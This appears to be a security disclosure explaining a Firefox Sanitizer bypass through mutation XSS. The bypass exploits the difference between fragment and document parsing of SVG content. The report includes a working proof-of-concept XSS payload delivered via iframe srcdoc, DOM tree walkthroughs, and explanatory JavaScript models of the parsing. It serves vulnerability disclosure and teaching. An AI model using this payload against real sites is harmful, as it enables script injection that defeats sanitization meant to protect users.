I've found a bug in the Firefox sanitizer that can be exploited if the result of
sanitizeToString is used in a sink that doesn't parse HTML using the fragment parsing algorithm (examples being:
Proof of concept
Here's the proof-of-concept:
// Assumes `ifr` refers to an <iframe> element already present in the page.
const bypass = `<svg><font color><title><u rel="</title><img src onerror=alert(document.domain)>">`;
ifr.srcdoc = new Sanitizer().sanitizeToString(bypass);
Make sure to test on Firefox Nightly. An alert is shown despite using the sanitizer.
There's an interesting difference in the HTML spec between how the fragment parsing algorithm and the document parsing algorithm handle foreign content.
Suppose we have the following markup:
<svg><p>
If we use the document parsing algorithm (via srcdoc, for instance), it creates the following DOM tree:
├ <svg svg>
└ <html p>
(In this notation, each tag name is prefixed with the name of its namespace.)
On the other hand, if we use the fragment parsing algorithm (via innerHTML), it creates the following DOM tree:
└ <svg svg>
  └ <svg p>
This is correct per the HTML spec and its rules for parsing tokens in foreign content (interestingly, however, Chrome parses both cases the same way).
According to the specification, if the parser is in document parsing mode, then certain tokens (<p> included) "escape" the foreign content. The same doesn't happen in fragment parsing.
Another interesting tag that "escapes" foreign content is <font>, because it does so only if it has an attribute named color, face, or size.
So in document parsing mode the markup <svg><font> creates svg font, while <svg><font face> creates html font.
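The "escape" rule described above can be modelled in a few lines. This is only a sketch of the behaviour as described in this report, not the parser's actual implementation: the tag list is taken from the HTML spec's rules for parsing tokens in foreign content, while the helper name namespaceInsideSvg and its mode parameter are hypothetical and exist only for illustration.

```javascript
// Start tags that leave foreign (SVG/MathML) content, per the HTML spec's
// "rules for parsing tokens in foreign content".
const BREAKOUT_TAGS = new Set([
  'b', 'big', 'blockquote', 'body', 'br', 'center', 'code', 'dd', 'div',
  'dl', 'dt', 'em', 'embed', 'h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'head',
  'hr', 'i', 'img', 'li', 'listing', 'menu', 'meta', 'nobr', 'ol', 'p',
  'pre', 'ruby', 's', 'small', 'span', 'strong', 'strike', 'sub', 'sup',
  'table', 'tt', 'u', 'ul', 'var',
]);

// <font> only breaks out when it carries one of these attributes.
const FONT_BREAKOUT_ATTRS = ['color', 'face', 'size'];

// Hypothetical helper: which namespace does a start tag end up in when it
// appears directly inside <svg>? `mode` is 'document' or 'fragment'.
function namespaceInsideSvg(tagName, attrNames, mode) {
  const name = tagName.toLowerCase();
  const attrs = attrNames.map((a) => a.toLowerCase());
  const breaksOut =
    BREAKOUT_TAGS.has(name) ||
    (name === 'font' && attrs.some((a) => FONT_BREAKOUT_ATTRS.includes(a)));
  // In this model only the document parser acts on the breakout rule.
  return breaksOut && mode === 'document' ? 'html' : 'svg';
}

console.log(namespaceInsideSvg('p', [], 'document'));          // html
console.log(namespaceInsideSvg('p', [], 'fragment'));          // svg
console.log(namespaceInsideSvg('font', [], 'document'));       // svg
console.log(namespaceInsideSvg('font', ['face'], 'document')); // html
```

The model deliberately ignores integration points and the rest of the tree builder. It only captures the one decision that differs between the two parsing modes.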
Now consider the following markup (that was the bypass):
<svg><font color><title><u rel="</title><img src onerror=alert(document.domain)>">
Internally, the Firefox sanitizer uses the fragment parsing algorithm. This means that the markup is parsed into the following DOM tree:
└ <svg svg>
  └ <svg font color="">
    └ <svg title>
      └ <html u rel="</title><img src onerror=alert(document.domain)>">
All of these elements and attributes are allow-listed by the sanitizer. When authors use sanitizeToString, the markup is serialized to:
<svg><font color=""><title><u rel="</title><img src onerror=alert(document.domain)>"></u></title></font></svg>
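To see why </title> survives inside the rel attribute, here is a minimal sketch of the serialization step. It assumes that attribute values are escaped only for &, non-breaking space, and the double quote, which is consistent with the serialized output shown in this report. The tree shape ({ name, attrs, children }) and the function names are hypothetical, chosen only for illustration.

```javascript
// Assumption: only &, U+00A0 and " are escaped in attribute values,
// so "<" and ">" pass through unchanged.
function escapeAttribute(value) {
  return value
    .replace(/&/g, '&amp;')
    .replace(/\u00A0/g, '&nbsp;')
    .replace(/"/g, '&quot;');
}

// Hypothetical tree shape: { name, attrs: { attrName: value }, children: [] }.
function serialize(node) {
  const attrs = Object.entries(node.attrs)
    .map(([key, value]) => ` ${key}="${escapeAttribute(value)}"`)
    .join('');
  const inner = node.children.map(serialize).join('');
  return `<${node.name}${attrs}>${inner}</${node.name}>`;
}

// The tree produced by fragment parsing of the bypass markup.
const payload = '</title><img src onerror=alert(document.domain)>';
const tree = {
  name: 'svg', attrs: {}, children: [{
    name: 'font', attrs: { color: '' }, children: [{
      name: 'title', attrs: {}, children: [{
        name: 'u', attrs: { rel: payload }, children: [],
      }],
    }],
  }],
};

const serialized = serialize(tree);
console.log(serialized);
```

The namespace of each element is not part of the serialized string, which is why the information that title was an SVG element is lost at this point.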
Now, when this result is assigned to srcdoc (or other places with document parsing mode), it is parsed into the following DOM tree:
├ <svg svg>
└ <html font color="">
  ├ <html title>
  │ └ #text: <u rel="
  ├ <html img src="" onerror="alert(document.domain)"/>
  └ #text: ">
So because of the difference between document and fragment parsing, <font color> "escaped" foreign content, and thus title is now parsed in the HTML namespace rather than the SVG namespace. This means that it is closed at the first instance of </title>, leading to the bypass.
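The last step can be illustrated with a simplified model of how the content of an HTML-namespace title is consumed: everything up to the first </title> end tag is treated as text, and normal parsing resumes right after it. The helper splitAtTitleEnd is hypothetical, and the regular expression is a rough approximation of the tokenizer's behaviour rather than a faithful implementation.

```javascript
// Hypothetical helper: given the input that follows an HTML <title> start tag,
// return the title's text and the remainder that is parsed as normal markup.
function splitAtTitleEnd(afterStartTag) {
  const match = /<\/title\s*>/i.exec(afterStartTag);
  if (match === null) return { text: afterStartTag, rest: '' };
  return {
    text: afterStartTag.slice(0, match.index),
    rest: afterStartTag.slice(match.index + match[0].length),
  };
}

// Input following <title> in the serialized sanitizer output.
const afterTitle =
  '<u rel="</title><img src onerror=alert(document.domain)>"></u></title></font></svg>';
const { text, rest } = splitAtTitleEnd(afterTitle);

console.log(text);                                  // <u rel="
console.log(rest.startsWith('<img src onerror='));  // true
```

In the SVG namespace, title has no such special handling, so the same characters stay safely inside the rel attribute value.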